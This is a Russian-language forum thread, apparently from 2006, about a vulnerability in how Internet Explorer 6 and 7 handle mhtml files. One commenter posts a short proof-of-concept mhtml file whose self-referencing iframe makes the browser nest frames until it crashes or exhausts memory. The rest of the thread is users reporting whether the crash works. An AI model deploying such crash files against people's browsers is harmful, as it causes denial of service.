Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1
RSS
Уязвимость при обработке mhtml файлов в Internet Explorer 7
 
Обсуждение статьи Уязвимость при обработке mhtml файлов в Internet Explorer 7
 
6-й тоже подвержен этой уязвимости.
 
Ну, понеслась...
 
mda 6a kazhdij denj budut vipuskatj relizi pod ie7
 
У меня не падает. Что я делаю не так?
 
Чё-то внатуре не падает нифуя. Позитив облажалась. Или мне ещё какй-то файлик нужен. который во фрейме открывается?
 
Это верстальщик ошибся. Два таба надо вставить. И будет вам счастие.
 
Создайте файлик test.mhtml со следующим содержимым:
Код
Content-Type: text/html;
charset="windows-1251"
Content-Transfer-Encoding: quoted-printable
Content-Location: about:blank

<iframe name=3Difr src=3D"">


и откройте его интернет эксплорером. Посли нескольких секунд эксплорер закроется так как будет переполнение стека.
 
Блин, плохо сработал тэг CODE.
Вот содержимое файла:

Content-Type: text/html;
charset="windows-1251"
Content-Transfer-Encoding: quoted-printable
Content-Location: about:blank

<iframe name=3Difr src=3D"">
 
не робит
 
Цитата
Гость, 02.11.2006 15:21:08
не робит
Да лааадно, все работает.
 
Да, действительно, от одной строчки кода его так колбасит, начинает создавать вложенные ифреймы, пока не упадет.

IE 6.0.2900.2180, сижу на самом деле не на нем, так что может, чуть старый.
 
не работает
Жрет ресурсы но не дохнет
 
А как можно эту уязвимость использовать?
 
IE7 Поедает ресурсы, но не падает, хотя толку всеравно киллом процесса снимается, а вот под надстройкой  Макстон падает.
 
Да падает он! У тебя просто очень много памяти. Когда он з@срет почти всю память, тогда и вывалится.
 
И ещё как работает.

IE в плевательницу :-)
FireFox -- РУЛЕЗ
 
А что означает заголовок X-MimeOLE: Produced By IE Fuzz 0.1?
Это что ли Позитив разрабатывает свой фуззер?
Типа хотят переплюнуть HD Moore?
 
Прикольно
 
*  толку, как ее использовать то (ну и упал он и че дальше то????)
Страницы: 1
Читают тему